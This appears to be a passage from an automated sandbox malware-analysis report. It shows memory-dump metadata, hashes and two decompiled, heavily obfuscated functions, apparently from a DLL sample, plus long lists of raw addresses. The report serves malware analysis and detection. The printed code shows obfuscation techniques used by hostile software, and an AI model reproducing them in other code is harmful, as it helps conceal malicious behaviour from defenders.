                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6a0d1
                                                                                                                                                                            0x02f6a0cb
                                                                                                                                                                            0x02f6a0c3
                                                                                                                                                                            0x02f6a1a9
                                                                                                                                                                            0x02f6a1a9
                                                                                                                                                                            0x02f6a1af
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6a1bf
                                                                                                                                                                            0x02f6a1bf
                                                                                                                                                                            0x02f6a13b
                                                                                                                                                                            0x02f6a13f
                                                                                                                                                                            0x02f6a14b
                                                                                                                                                                            0x02f6a150
                                                                                                                                                                            0x02f6a185
                                                                                                                                                                            0x02f6a19c
                                                                                                                                                                            0x02f6a1a1
                                                                                                                                                                            0x02f6a1a4
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: "$%;$K3
                                                                                                                                                                            • API String ID: 0-3594330084
                                                                                                                                                                            • Opcode ID: 02d7dce43ea670121bf6622eada0af2cef8733e108d245e6c9d908b794ede0c2
                                                                                                                                                                            • Instruction ID: 02303c1c0c82c2f5a21dfff9e6d45637fc895abbc053a325127110d3af482a06
                                                                                                                                                                            • Opcode Fuzzy Hash: 02d7dce43ea670121bf6622eada0af2cef8733e108d245e6c9d908b794ede0c2
                                                                                                                                                                            • Instruction Fuzzy Hash: 02A17572508380AFD354DF66C98956FBBE2FBC5798F00891DF28666220D7B58949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E02F5A445() {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				void* _t198;
                                                                                                                                                                            				signed int _t201;
                                                                                                                                                                            				signed int _t203;
                                                                                                                                                                            				void* _t206;
                                                                                                                                                                            				void* _t220;
                                                                                                                                                                            				void* _t225;
                                                                                                                                                                            				signed int _t226;
                                                                                                                                                                            				signed int _t227;
                                                                                                                                                                            				signed int _t228;
                                                                                                                                                                            				intOrPtr _t229;
                                                                                                                                                                            				intOrPtr* _t230;
                                                                                                                                                                            				signed int _t231;
                                                                                                                                                                            				signed int* _t232;
                                                                                                                                                                            
                                                                                                                                                                            				_t232 =  &_v84;
                                                                                                                                                                            				_v16 = 0x845726;
                                                                                                                                                                            				_v16 = _v16 << 7;
                                                                                                                                                                            				_t206 = 0xba97f4f;
                                                                                                                                                                            				_v16 = _v16 ^ 0x422a9300;
                                                                                                                                                                            				_v76 = 0xf633ca;
                                                                                                                                                                            				_v76 = _v76 + 0xffff7f31;
                                                                                                                                                                            				_v76 = _v76 << 6;
                                                                                                                                                                            				_v76 = _v76 | 0x2929f239;
                                                                                                                                                                            				_v76 = _v76 ^ 0x3d62fec6;
                                                                                                                                                                            				_v20 = 0xcffe1c;
                                                                                                                                                                            				_v20 = _v20 ^ 0x03d09261;
                                                                                                                                                                            				_v20 = _v20 ^ 0x03162068;
                                                                                                                                                                            				_v24 = 0xa4ea56;
                                                                                                                                                                            				_v24 = _v24 + 0xffff4c41;
                                                                                                                                                                            				_v24 = _v24 ^ 0x00afa4b9;
                                                                                                                                                                            				_v40 = 0x50bd11;
                                                                                                                                                                            				_v40 = _v40 + 0xffffa7ab;
                                                                                                                                                                            				_v40 = _v40 * 0x3f;
                                                                                                                                                                            				_t225 = 0;
                                                                                                                                                                            				_v40 = _v40 ^ 0x13cebba3;
                                                                                                                                                                            				_v60 = 0x50c08b;
                                                                                                                                                                            				_v60 = _v60 ^ 0xc2cf2608;
                                                                                                                                                                            				_v60 = _v60 << 4;
                                                                                                                                                                            				_t226 = 0x56;
                                                                                                                                                                            				_v60 = _v60 / _t226;
                                                                                                                                                                            				_v60 = _v60 ^ 0x0073141c;
                                                                                                                                                                            				_v64 = 0xa37df4;
                                                                                                                                                                            				_v64 = _v64 + 0xffffdd88;
                                                                                                                                                                            				_v64 = _v64 + 0xe629;
                                                                                                                                                                            				_v64 = _v64 << 3;
                                                                                                                                                                            				_v64 = _v64 ^ 0x0527d1d9;
                                                                                                                                                                            				_v68 = 0x27b9fb;
                                                                                                                                                                            				_t227 = 0x58;
                                                                                                                                                                            				_v68 = _v68 / _t227;
                                                                                                                                                                            				_v68 = _v68 * 0x63;
                                                                                                                                                                            				_v68 = _v68 * 0x3d;
                                                                                                                                                                            				_v68 = _v68 ^ 0x0aa4ff90;
                                                                                                                                                                            				_v72 = 0x604a05;
                                                                                                                                                                            				_v72 = _v72 | 0x3301bbe0;
                                                                                                                                                                            				_v72 = _v72 + 0xf4ce;
                                                                                                                                                                            				_v72 = _v72 + 0xffff6149;
                                                                                                                                                                            				_v72 = _v72 ^ 0x336b10da;
                                                                                                                                                                            				_v52 = 0x457d04;
                                                                                                                                                                            				_v52 = _v52 * 0x45;
                                                                                                                                                                            				_v52 = _v52 | 0xd82309ca;
                                                                                                                                                                            				_v52 = _v52 + 0xff64;
                                                                                                                                                                            				_v52 = _v52 ^ 0xdab2f2cc;
                                                                                                                                                                            				_v8 = 0x71eccb;
                                                                                                                                                                            				_v8 = _v8 >> 3;
                                                                                                                                                                            				_v8 = _v8 ^ 0x000a626b;
                                                                                                                                                                            				_v12 = 0x94a0c6;
                                                                                                                                                                            				_v12 = _v12 + 0xffffb2fd;
                                                                                                                                                                            				_v12 = _v12 ^ 0x009145d9;
                                                                                                                                                                            				_v56 = 0xdce517;
                                                                                                                                                                            				_v56 = _v56 >> 1;
                                                                                                                                                                            				_v56 = _v56 | 0xebc149ed;
                                                                                                                                                                            				_v56 = _v56 + 0xffff7372;
                                                                                                                                                                            				_v56 = _v56 ^ 0xebe5f8bb;
                                                                                                                                                                            				_v44 = 0x6f3a42;
                                                                                                                                                                            				_v44 = _v44 ^ 0x930a70ca;
                                                                                                                                                                            				_v44 = _v44 ^ 0x072310e6;
                                                                                                                                                                            				_v44 = _v44 ^ 0x944572d0;
                                                                                                                                                                            				_v28 = 0xde598c;
                                                                                                                                                                            				_v28 = _v28 + 0xffffb8ee;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00dc27c3;
                                                                                                                                                                            				_v80 = 0x428d3e;
                                                                                                                                                                            				_v80 = _v80 * 0x44;
                                                                                                                                                                            				_v80 = _v80 + 0x7fb1;
                                                                                                                                                                            				_v80 = _v80 ^ 0x009e7bae;
                                                                                                                                                                            				_v80 = _v80 ^ 0x11330260;
                                                                                                                                                                            				_v84 = 0x321edf;
                                                                                                                                                                            				_v84 = _v84 | 0x009a6787;
                                                                                                                                                                            				_v84 = _v84 ^ 0xc86f44a5;
                                                                                                                                                                            				_v84 = _v84 ^ 0xbb12ab62;
                                                                                                                                                                            				_v84 = _v84 ^ 0x73cf70d9;
                                                                                                                                                                            				_v48 = 0x740eb7;
                                                                                                                                                                            				_v48 = _v48 * 0x2b;
                                                                                                                                                                            				_v48 = _v48 * 0x4f;
                                                                                                                                                                            				_v48 = _v48 + 0xb6e6;
                                                                                                                                                                            				_v48 = _v48 ^ 0x040daff3;
                                                                                                                                                                            				_v32 = 0x3035f0;
                                                                                                                                                                            				_v32 = _v32 ^ 0xe5f6800a;
                                                                                                                                                                            				_v32 = _v32 << 1;
                                                                                                                                                                            				_v32 = _v32 ^ 0xcb8c371c;
                                                                                                                                                                            				_v36 = 0xd97c9c;
                                                                                                                                                                            				_v36 = _v36 >> 3;
                                                                                                                                                                            				_v36 = _v36 * 0x24;
                                                                                                                                                                            				_v36 = _v36 ^ 0x03d4918e;
                                                                                                                                                                            				_v4 = 0x2cfea0;
                                                                                                                                                                            				_v4 = _v4 ^ 0xf57e16a0;
                                                                                                                                                                            				_v4 = _v4 ^ 0xf550cd22;
                                                                                                                                                                            				_t205 = _v4;
                                                                                                                                                                            				_t231 = _v4;
                                                                                                                                                                            				_t228 = _v4;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_push(0x5c);
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						L2:
                                                                                                                                                                            						_t198 = 0xd71e2f;
                                                                                                                                                                            						do {
                                                                                                                                                                            							L3:
                                                                                                                                                                            							while(_t206 != _t198) {
                                                                                                                                                                            								if(_t206 == 0x1e5f8bf) {
                                                                                                                                                                            									_t201 = E02F5EE62(_v60, _t205, _v64, _v68, _v72, _v16, _t228);
                                                                                                                                                                            									_t232 =  &(_t232[5]);
                                                                                                                                                                            									_t231 = _t201;
                                                                                                                                                                            									_t198 = 0xd71e2f;
                                                                                                                                                                            									_t206 =  !=  ? 0xd71e2f : 0x6f129a6;
                                                                                                                                                                            									_t220 = 0x5c;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t206 == 0x6f129a6) {
                                                                                                                                                                            										E02F53046(_v48, _v32, _v36, _t205, _v4);
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t206 == 0x960e40f) {
                                                                                                                                                                            											_t203 = E02F6E8B6(_t206, _v20, _v24, _t206, _v76, _v40);
                                                                                                                                                                            											_t205 = _t203;
                                                                                                                                                                            											_t232 =  &(_t232[4]);
                                                                                                                                                                            											if(_t203 != 0) {
                                                                                                                                                                            												_t206 = 0x1e5f8bf;
                                                                                                                                                                            												goto L1;
                                                                                                                                                                            											}
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t206 == 0xba97f4f) {
                                                                                                                                                                            												_t206 = 0xbab8332;
                                                                                                                                                                            												continue;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												if(_t206 == 0xbab8332) {
                                                                                                                                                                            													_t229 =  *0x2f76214; // 0x0
                                                                                                                                                                            													_t230 = _t229 + 0x23c;
                                                                                                                                                                            													while( *_t230 != _t220) {
                                                                                                                                                                            														_t230 = _t230 + 2;
                                                                                                                                                                            													}
                                                                                                                                                                            													_t228 = _t230 + 2;
                                                                                                                                                                            													_t206 = 0x960e40f;
                                                                                                                                                                            													goto L2;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													if(_t206 != 0xe557a67) {
                                                                                                                                                                            														goto L20;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														E02F53046(_v44, _v28, _v80, _t231, _v84);
                                                                                                                                                                            														_t232 =  &(_t232[3]);
                                                                                                                                                                            														_t206 = 0x6f129a6;
                                                                                                                                                                            														while(1) {
                                                                                                                                                                            															L1:
                                                                                                                                                                            															_push(0x5c);
                                                                                                                                                                            															L2:
                                                                                                                                                                            															_t198 = 0xd71e2f;
                                                                                                                                                                            															goto L3;
                                                                                                                                                                            														}
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								L23:
                                                                                                                                                                            								return _t225;
                                                                                                                                                                            							}
                                                                                                                                                                            							E02F51E9B(_v52, _t231, _v8, _v12, _v56);
                                                                                                                                                                            							_t232 =  &(_t232[3]);
                                                                                                                                                                            							_t198 = 0xd71e2f;
                                                                                                                                                                            							_t225 =  !=  ? 1 : _t225;
                                                                                                                                                                            							_t206 = 0xe557a67;
                                                                                                                                                                            							_t220 = 0x5c;
                                                                                                                                                                            							L20:
                                                                                                                                                                            						} while (_t206 != 0x6b89e3f);
                                                                                                                                                                            						goto L23;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}





































                                                                                                                                                                            0x02f5a445
                                                                                                                                                                            0x02f5a448
                                                                                                                                                                            0x02f5a452
                                                                                                                                                                            0x02f5a457
                                                                                                                                                                            0x02f5a45c
                                                                                                                                                                            0x02f5a464
                                                                                                                                                                            0x02f5a46c
                                                                                                                                                                            0x02f5a474
                                                                                                                                                                            0x02f5a479
                                                                                                                                                                            0x02f5a481
                                                                                                                                                                            0x02f5a489
                                                                                                                                                                            0x02f5a491
                                                                                                                                                                            0x02f5a499
                                                                                                                                                                            0x02f5a4a1
                                                                                                                                                                            0x02f5a4a9
                                                                                                                                                                            0x02f5a4b1
                                                                                                                                                                            0x02f5a4b9
                                                                                                                                                                            0x02f5a4c1
                                                                                                                                                                            0x02f5a4d2
                                                                                                                                                                            0x02f5a4d6
                                                                                                                                                                            0x02f5a4d8
                                                                                                                                                                            0x02f5a4e0
                                                                                                                                                                            0x02f5a4e8
                                                                                                                                                                            0x02f5a4f0
                                                                                                                                                                            0x02f5a4fb
                                                                                                                                                                            0x02f5a500
                                                                                                                                                                            0x02f5a506
                                                                                                                                                                            0x02f5a50e
                                                                                                                                                                            0x02f5a516
                                                                                                                                                                            0x02f5a51e
                                                                                                                                                                            0x02f5a526
                                                                                                                                                                            0x02f5a52b
                                                                                                                                                                            0x02f5a533
                                                                                                                                                                            0x02f5a53f
                                                                                                                                                                            0x02f5a542
                                                                                                                                                                            0x02f5a54b
                                                                                                                                                                            0x02f5a554
                                                                                                                                                                            0x02f5a558
                                                                                                                                                                            0x02f5a560
                                                                                                                                                                            0x02f5a568
                                                                                                                                                                            0x02f5a570
                                                                                                                                                                            0x02f5a578
                                                                                                                                                                            0x02f5a580
                                                                                                                                                                            0x02f5a588
                                                                                                                                                                            0x02f5a595
                                                                                                                                                                            0x02f5a599
                                                                                                                                                                            0x02f5a5a1
                                                                                                                                                                            0x02f5a5a9
                                                                                                                                                                            0x02f5a5b1
                                                                                                                                                                            0x02f5a5b9
                                                                                                                                                                            0x02f5a5be
                                                                                                                                                                            0x02f5a5c6
                                                                                                                                                                            0x02f5a5ce
                                                                                                                                                                            0x02f5a5d6
                                                                                                                                                                            0x02f5a5de
                                                                                                                                                                            0x02f5a5e6
                                                                                                                                                                            0x02f5a5ea
                                                                                                                                                                            0x02f5a5f2
                                                                                                                                                                            0x02f5a5fa
                                                                                                                                                                            0x02f5a602
                                                                                                                                                                            0x02f5a60a
                                                                                                                                                                            0x02f5a612
                                                                                                                                                                            0x02f5a61a
                                                                                                                                                                            0x02f5a622
                                                                                                                                                                            0x02f5a62a
                                                                                                                                                                            0x02f5a632
                                                                                                                                                                            0x02f5a63a
                                                                                                                                                                            0x02f5a647
                                                                                                                                                                            0x02f5a64b
                                                                                                                                                                            0x02f5a653
                                                                                                                                                                            0x02f5a65b
                                                                                                                                                                            0x02f5a663
                                                                                                                                                                            0x02f5a66b
                                                                                                                                                                            0x02f5a673
                                                                                                                                                                            0x02f5a67b
                                                                                                                                                                            0x02f5a683
                                                                                                                                                                            0x02f5a68b
                                                                                                                                                                            0x02f5a698
                                                                                                                                                                            0x02f5a6a1
                                                                                                                                                                            0x02f5a6a5
                                                                                                                                                                            0x02f5a6ad
                                                                                                                                                                            0x02f5a6b5
                                                                                                                                                                            0x02f5a6bd
                                                                                                                                                                            0x02f5a6c5
                                                                                                                                                                            0x02f5a6c9
                                                                                                                                                                            0x02f5a6d1
                                                                                                                                                                            0x02f5a6d9
                                                                                                                                                                            0x02f5a6e3
                                                                                                                                                                            0x02f5a6e7
                                                                                                                                                                            0x02f5a6ef
                                                                                                                                                                            0x02f5a6f7
                                                                                                                                                                            0x02f5a6ff
                                                                                                                                                                            0x02f5a707
                                                                                                                                                                            0x02f5a70b
                                                                                                                                                                            0x02f5a70f
                                                                                                                                                                            0x02f5a713
                                                                                                                                                                            0x02f5a713
                                                                                                                                                                            0x02f5a713
                                                                                                                                                                            0x02f5a716
                                                                                                                                                                            0x02f5a716
                                                                                                                                                                            0x02f5a716
                                                                                                                                                                            0x02f5a71b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a71b
                                                                                                                                                                            0x02f5a729
                                                                                                                                                                            0x02f5a7f0
                                                                                                                                                                            0x02f5a7f5
                                                                                                                                                                            0x02f5a7f8
                                                                                                                                                                            0x02f5a801
                                                                                                                                                                            0x02f5a806
                                                                                                                                                                            0x02f5a80b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a72f
                                                                                                                                                                            0x02f5a735
                                                                                                                                                                            0x02f5a85f
                                                                                                                                                                            0x02f5a73b
                                                                                                                                                                            0x02f5a741
                                                                                                                                                                            0x02f5a7bd
                                                                                                                                                                            0x02f5a7c2
                                                                                                                                                                            0x02f5a7c4
                                                                                                                                                                            0x02f5a7c9
                                                                                                                                                                            0x02f5a7cf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a7cf
                                                                                                                                                                            0x02f5a743
                                                                                                                                                                            0x02f5a749
                                                                                                                                                                            0x02f5a7a2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a74b
                                                                                                                                                                            0x02f5a751
                                                                                                                                                                            0x02f5a77f
                                                                                                                                                                            0x02f5a785
                                                                                                                                                                            0x02f5a790
                                                                                                                                                                            0x02f5a78d
                                                                                                                                                                            0x02f5a78d
                                                                                                                                                                            0x02f5a795
                                                                                                                                                                            0x02f5a798
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a753
                                                                                                                                                                            0x02f5a759
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a75f
                                                                                                                                                                            0x02f5a770
                                                                                                                                                                            0x02f5a775
                                                                                                                                                                            0x02f5a778
                                                                                                                                                                            0x02f5a713
                                                                                                                                                                            0x02f5a713
                                                                                                                                                                            0x02f5a713
                                                                                                                                                                            0x02f5a716
                                                                                                                                                                            0x02f5a716
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a716
                                                                                                                                                                            0x02f5a713
                                                                                                                                                                            0x02f5a759
                                                                                                                                                                            0x02f5a751
                                                                                                                                                                            0x02f5a749
                                                                                                                                                                            0x02f5a741
                                                                                                                                                                            0x02f5a735
                                                                                                                                                                            0x02f5a867
                                                                                                                                                                            0x02f5a870
                                                                                                                                                                            0x02f5a870
                                                                                                                                                                            0x02f5a823
                                                                                                                                                                            0x02f5a828
                                                                                                                                                                            0x02f5a830
                                                                                                                                                                            0x02f5a835
                                                                                                                                                                            0x02f5a838
                                                                                                                                                                            0x02f5a83f
                                                                                                                                                                            0x02f5a840
                                                                                                                                                                            0x02f5a840
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5a84c
                                                                                                                                                                            0x02f5a716

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: )$B:o$kb
                                                                                                                                                                            • API String ID: 0-1085388577
                                                                                                                                                                            • Opcode ID: c2ea9f46bba4ae8ae22047dc0aaee687211bad19b315681a3ddafd55d0a52d6f
                                                                                                                                                                            • Instruction ID: e1dd1d47c59c8638523ba50bed3e749e404cdc0449e657f875879172cf30fb4d
                                                                                                                                                                            • Opcode Fuzzy Hash: c2ea9f46bba4ae8ae22047dc0aaee687211bad19b315681a3ddafd55d0a52d6f
                                                                                                                                                                            • Instruction Fuzzy Hash: 98A142719083419FC398CF65D89981BBBF1FBC4788F009A2DFA9696260D3B18919CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E02F6BEFD(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				char _v616;
                                                                                                                                                                            				void* _t242;
                                                                                                                                                                            				void* _t243;
                                                                                                                                                                            				signed int _t251;
                                                                                                                                                                            				signed int _t252;
                                                                                                                                                                            				signed int _t253;
                                                                                                                                                                            				signed int _t254;
                                                                                                                                                                            				signed int _t255;
                                                                                                                                                                            				signed int _t256;
                                                                                                                                                                            				signed int _t257;
                                                                                                                                                                            				signed int _t258;
                                                                                                                                                                            				signed int _t259;
                                                                                                                                                                            				intOrPtr _t285;
                                                                                                                                                                            
                                                                                                                                                                            				_v52 = 0xa5be;
                                                                                                                                                                            				_t251 = 0x16;
                                                                                                                                                                            				_v52 = _v52 / _t251;
                                                                                                                                                                            				_v52 = _v52 >> 0xc;
                                                                                                                                                                            				_v52 = _v52 ^ 0x0005c33b;
                                                                                                                                                                            				_v48 = 0xc42d20;
                                                                                                                                                                            				_v48 = _v48 >> 0xd;
                                                                                                                                                                            				_v48 = _v48 + 0xffffc4d0;
                                                                                                                                                                            				_v48 = _v48 ^ 0xfffeda29;
                                                                                                                                                                            				_v72 = 0x4321a7;
                                                                                                                                                                            				_v72 = _v72 | 0xa4ce3c40;
                                                                                                                                                                            				_v72 = _v72 ^ 0xa4cab40f;
                                                                                                                                                                            				_v24 = 0x227e38;
                                                                                                                                                                            				_t25 =  &_v24; // 0x227e38
                                                                                                                                                                            				_t252 = 0x2c;
                                                                                                                                                                            				_v24 =  *_t25 * 0x3c;
                                                                                                                                                                            				_t27 =  &_v24; // 0x227e38
                                                                                                                                                                            				_v24 =  *_t27 * 0x66;
                                                                                                                                                                            				_t29 =  &_v24; // 0x227e38
                                                                                                                                                                            				_v24 =  *_t29 / _t252;
                                                                                                                                                                            				_v24 = _v24 ^ 0x014a285a;
                                                                                                                                                                            				_v60 = 0xfcfbbc;
                                                                                                                                                                            				_v60 = _v60 >> 8;
                                                                                                                                                                            				_v60 = _v60 ^ 0x000d93d1;
                                                                                                                                                                            				_v96 = 0xf80007;
                                                                                                                                                                            				_v96 = _v96 + 0xaa36;
                                                                                                                                                                            				_v96 = _v96 ^ 0x00fda443;
                                                                                                                                                                            				_v80 = 0x5511cc;
                                                                                                                                                                            				_v80 = _v80 >> 6;
                                                                                                                                                                            				_v80 = _v80 ^ 0x00043fa8;
                                                                                                                                                                            				_v88 = 0xbb6e3f;
                                                                                                                                                                            				_v88 = _v88 + 0xffffbcf0;
                                                                                                                                                                            				_v88 = _v88 ^ 0x00b4c382;
                                                                                                                                                                            				_v8 = 0x49da65;
                                                                                                                                                                            				_v8 = _v8 >> 3;
                                                                                                                                                                            				_v8 = _v8 >> 7;
                                                                                                                                                                            				_v8 = _v8 >> 0xb;
                                                                                                                                                                            				_v8 = _v8 ^ 0x0002f4aa;
                                                                                                                                                                            				_v16 = 0xc843f1;
                                                                                                                                                                            				_t253 = 0x50;
                                                                                                                                                                            				_v16 = _v16 / _t253;
                                                                                                                                                                            				_v16 = _v16 ^ 0x9e242cdc;
                                                                                                                                                                            				_v16 = _v16 + 0xffff9a81;
                                                                                                                                                                            				_v16 = _v16 ^ 0x9e230a73;
                                                                                                                                                                            				_v36 = 0x2e6bc5;
                                                                                                                                                                            				_v36 = _v36 | 0x2558a4e0;
                                                                                                                                                                            				_v36 = _v36 + 0xfffff4e9;
                                                                                                                                                                            				_v36 = _v36 ^ 0x257724e9;
                                                                                                                                                                            				_v12 = 0x80a3b9;
                                                                                                                                                                            				_t254 = 0x6f;
                                                                                                                                                                            				_v12 = _v12 * 0x79;
                                                                                                                                                                            				_v12 = _v12 + 0xffff3c67;
                                                                                                                                                                            				_v12 = _v12 | 0xeef82a75;
                                                                                                                                                                            				_v12 = _v12 ^ 0xfef88c24;
                                                                                                                                                                            				_v68 = 0x7db499;
                                                                                                                                                                            				_v68 = _v68 + 0xffff3f49;
                                                                                                                                                                            				_v68 = _v68 ^ 0x007e0dc2;
                                                                                                                                                                            				_v44 = 0x9f49e4;
                                                                                                                                                                            				_v44 = _v44 << 0xd;
                                                                                                                                                                            				_v44 = _v44 ^ 0x1368a87d;
                                                                                                                                                                            				_v44 = _v44 ^ 0xfa51dcf6;
                                                                                                                                                                            				_v64 = 0x98f463;
                                                                                                                                                                            				_v64 = _v64 / _t254;
                                                                                                                                                                            				_v64 = _v64 ^ 0x0008fd0c;
                                                                                                                                                                            				_v76 = 0x12aedd;
                                                                                                                                                                            				_v76 = _v76 + 0xf7e7;
                                                                                                                                                                            				_v76 = _v76 ^ 0x001c1bc6;
                                                                                                                                                                            				_v28 = 0x4e33bd;
                                                                                                                                                                            				_t255 = 3;
                                                                                                                                                                            				_v28 = _v28 / _t255;
                                                                                                                                                                            				_t256 = 0x48;
                                                                                                                                                                            				_v28 = _v28 / _t256;
                                                                                                                                                                            				_t257 = 0x1b;
                                                                                                                                                                            				_v28 = _v28 * 0x5d;
                                                                                                                                                                            				_v28 = _v28 ^ 0x002c0e7b;
                                                                                                                                                                            				_v20 = 0x6739f6;
                                                                                                                                                                            				_v20 = _v20 * 0x51;
                                                                                                                                                                            				_v20 = _v20 + 0x822b;
                                                                                                                                                                            				_v20 = _v20 + 0xffff6302;
                                                                                                                                                                            				_v20 = _v20 ^ 0x20a7052c;
                                                                                                                                                                            				_v40 = 0xf776a1;
                                                                                                                                                                            				_v40 = _v40 | 0xfaf9a8ad;
                                                                                                                                                                            				_v40 = _v40 + 0xffffa6b3;
                                                                                                                                                                            				_v40 = _v40 ^ 0xfaf95b8b;
                                                                                                                                                                            				_v56 = 0xfd0dae;
                                                                                                                                                                            				_v56 = _v56 / _t257;
                                                                                                                                                                            				_t258 = 0x23;
                                                                                                                                                                            				_v56 = _v56 / _t258;
                                                                                                                                                                            				_v56 = _v56 ^ 0x000358d4;
                                                                                                                                                                            				_v32 = 0xe62709;
                                                                                                                                                                            				_v32 = _v32 + 0xffff3f09;
                                                                                                                                                                            				_v32 = _v32 >> 8;
                                                                                                                                                                            				_v32 = _v32 ^ 0x0009f673;
                                                                                                                                                                            				_v92 = 0xdc059c;
                                                                                                                                                                            				_v92 = _v92 << 4;
                                                                                                                                                                            				_v92 = _v92 ^ 0x0dc87abe;
                                                                                                                                                                            				_v84 = 0xab2272;
                                                                                                                                                                            				_t259 = 0xb;
                                                                                                                                                                            				_v84 = _v84 / _t259;
                                                                                                                                                                            				_v84 = _v84 ^ 0x0001c613;
                                                                                                                                                                            				_t285 =  *0x2f76214; // 0x0
                                                                                                                                                                            				_t242 = E02F609DD(_v52, _t285 + 0x23c, _v48, _v72);
                                                                                                                                                                            				_t293 = _a4 + 0x2c;
                                                                                                                                                                            				_t243 = E02F7061D(_v24, _a4 + 0x2c, _t242, _v60, _v96);
                                                                                                                                                                            				_t302 = _t243;
                                                                                                                                                                            				if(_t243 != 0) {
                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                            					_push(_v88);
                                                                                                                                                                            					E02F72D0A(_v12, _t302, _t293, _v68, _v44, _v64, _a8,  &_v616,  *((intOrPtr*)(_a8 + 0x3c)), E02F6E1F8(0x2f51000, _v80, _t302));
                                                                                                                                                                            					E02F6FECB(_t246, _v76, _v28, _v20, _v40);
                                                                                                                                                                            					E02F5D061( &_v616, _v56, _v32, _v92, _v84);
                                                                                                                                                                            				}
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}







































                                                                                                                                                                            0x02f6bf06
                                                                                                                                                                            0x02f6bf15
                                                                                                                                                                            0x02f6bf1a
                                                                                                                                                                            0x02f6bf1f
                                                                                                                                                                            0x02f6bf23
                                                                                                                                                                            0x02f6bf2a
                                                                                                                                                                            0x02f6bf31
                                                                                                                                                                            0x02f6bf35
                                                                                                                                                                            0x02f6bf3c
                                                                                                                                                                            0x02f6bf43
                                                                                                                                                                            0x02f6bf4a
                                                                                                                                                                            0x02f6bf51
                                                                                                                                                                            0x02f6bf58
